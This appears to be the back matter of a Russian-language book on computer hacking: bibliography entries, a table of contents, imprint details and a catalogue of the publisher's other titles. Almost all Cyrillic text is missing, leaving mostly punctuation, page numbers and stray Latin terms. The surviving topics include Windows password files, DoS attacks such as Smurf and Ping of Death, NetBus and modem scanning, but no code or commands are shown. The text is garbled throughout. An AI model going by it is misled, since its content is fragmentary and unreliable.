12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .


1.

1.

- ?
?
?

7
10
16
17
18

24

2.

25

26

26
28
29

30
31
:

31
33

35

3.

36




Web
Web

36
37
38
39
40
41
42
43
43
44
44
45

4. Windows 2000/XP

46

46
47
... 48

389

Windows 2000/XP

49

SAM


Windows 2000

50
51
52
54

56
57

2.

58

5.

58

59

NTFSDOS Pro

60

BIOS


SAM
.pwl

65
66
68
."
'.

69
72

76

6.

78

78


******

79
84
87

89
89
90
90
92
93

94

7.

95

96

97
101
104

106
107
108

109
110

390

.......110
111

112

3. -

113

8. Web

113

HTML


ActiveX
.

Web-
SSL

9.

115

119
119
121
122

123
126
127
128

129

129





MIME

130
131
132
134
135
137
140


W W W

144
146
147

10.

148

148
...t50
153
155
155

156
161
163

11. ICQ

164

.. 165

391

ICQ
-UIN
IP- ICQ-
ICQ-
ICQ
ICQ-

166
167
168
169
171
176

177

178

4. Web

180

12. Web-

181

Web-
Web-
Web-

181
182
184

184
186

IIS 5

187

HTTP

188
191

Web- Teleport Pro

197



HTML

198
202
204

Web

205
208

13. DoS
DoS

UDP

209

Smurf

213
214



Nuke
Teardrop
Ping of Death
Land

'.


DoS

...

210
211
211
215
218
218
220
220
221

221
222

225

392

5. TCP/IP

226

14. Windows 2000/XP

227

TCP/IP





NetBus

227
229
229
231
232
234
235
239
241

15.

242

pcAnywhere
:
pcAnywhere
pcAnywhere
SNMP
SNMP
SOLARWINDS

243
243
.249
252
252
253
257

16.

258








WinRoute Pro

WinRoute Pro
WinRoute Pro
ACL
FTP
ACL

258
259
261
265
266
267
267
268
269
271
273
273
274
275
276

17.

277
277
... 279

393

ARP

TCP-

280

282
285

18.

PhoneSweep 4.4

286
287
288

PhoneSweep 4.4


288
290
292
294

PhoneSweep

295

295

299

. HTML DHTML

300
300

HTML
HTML

301
302

HTML

306

Ter<Form>

Ter<SCRIPT>

306
307
309
310
313

. CGI

315

316

317
318

. HTTP
HTTP
HTTP

D. TCP/IP
OSI

320
322

322
324
325
328

331
331
334

337
337
338

394






OSI
IP-
TCP/IP
IP-
TCP/IP





Active Directory
IP-
iPsec

'.

.










-




Windows 2000

338
339
339
339
340
340
340
341
343
344
346
346
350
352
355
358
358
360
361

363
363
364
366
366
367
369
370
371
372
372
374
375
376
377
378
379

F. -

381

387

U
U AHTUXAKUHC:
U

( , , , - 3000)
: (095) 720-07-65 (). E-mail: opt@triumph.ru
-: www.3st.ru
-: 125438, ., / 18 . E-mail: post@triumph.ru
:
-
-
-

, , - Alex WebKnacKer.
.. .
.. .
.. .
. 125438, ., / 18.
00033 10.08.99 .
- 25.10.03 .
70x100/16. . . . 25.
1687.
4000 .


143200, . , . , 93

( , ,
, - 3000)




, ,
:
125438, . , / 18
,
.
-:

www.3st.ru
:

post@triumph.ru
,
.

!!!

(!) ,
.

001

002

003

092

084

096

100

. 20
, , .
+ -. (448 .)
.
50 , ,
AudioCD, MP3, DVD-Audio
, WMA, WAV (PCM), OGG,
, (+), VQF, MIDI, RM, Dolby Digital (AC3) u Dolby
Surround. + -. (416 .)
. 25
, , , , , ,
. + -. (432 .)
. 25 , , -, ,
, , Web -: ICQ, NetMeeting, The Bat!, WinAmp, Opera,
Agintum Outpost, MP3Locator, GetRight, Promt XT Internet ...
+ -. (384 .)
. 15 / ,
, , : ScenalyzerLive, Ulead MediaStudio, Adobe Premiere,
Adobe After Effects, Hollywood FX, Boris RED, Canopus XPIode, Morph
Man, Ulead COOL 3D, Illusion, Sound Forge, Audiograbber, WinMP3
Locator, Gnucleus, Audio Compositor. + -. (416 .)
. 11
.
+ -. (416 .)
.
25 VidcoCD,
SuperVideoCD, MPEG 4, DVD
X(S)VideoCD. + -. (400 .)

299

242

242

242

299

299

299

028

CD-ROM, AudioCD,
VideoCD, DVD. + -. (368 .)

237

029

. ,
: Ulead Mediastudio Pro 7.
+ -. (576.)

299

098

. : .
+ -. (400.)

199

085

. -
. (8000 . 528 .)

179

030

, ,
Web-. + -. (464 .)

217

082

027

. : , ,
. + -. (400 .)
. , .
(368 .)

217
159

009

. .
+ -. .. . (368.)

013

Web- Web-. . (496 .)

149

012

. . (400 .)

159

217

179

033

! + .

080

Windows 98/ME/2000/XP. + . (400 .)

179

087

! + . (352 .)

179

099

! + . (416 .)

299

(384 .)

019


. . . (784 .)

345

101

Web-. + -. (560 .)

345

Adobe After Effects 5.0. , ,


. .
+ -. (400 .)

299

023

Adobe Premiere* 6.x. .


+ -. (448 .)

299

091

Adobe Photoshop 7. .
+ -. (496 .)

299

090

Adobe Illustrator 9 10. .


+ -. (464 .)

299

040

-. (368 .)

181

041

, , , CD, DVD
. (400 .)

181

097

088

022

.
(368 .)
. (400 .)

181
181

018

XML . + -. (368 .)

242

017

WAP . -
. + -. (416 .)

242

095

.
+ -. (320 .)
.
+ -. (336 .)

242

C++ . + -.
(464 .)

299

089
102

242